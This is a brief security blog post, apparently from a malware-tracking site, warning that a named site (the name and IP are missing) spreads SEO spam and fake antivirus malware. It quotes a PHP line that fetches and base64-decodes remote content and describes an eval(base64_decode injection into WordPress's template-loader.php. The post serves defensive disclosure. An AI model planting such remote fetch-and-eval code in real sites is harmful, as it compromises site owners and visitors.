Malware update –

Quick malware update: The site (nice name) is being used to distribute SEO spam and malware (Rhe famous fake AV, say it ain’t so).

You can get details of the code being used here:

$links = base64_decode(file_get_contents($outsourceurl));

Most of the time, it is inserting an eval(base64_decode inside the template-loader.php file from WordPress.

The malicious site is hosted at

Suggestion for hosting companies: Block this IP.


Comments are closed.

You May Also Like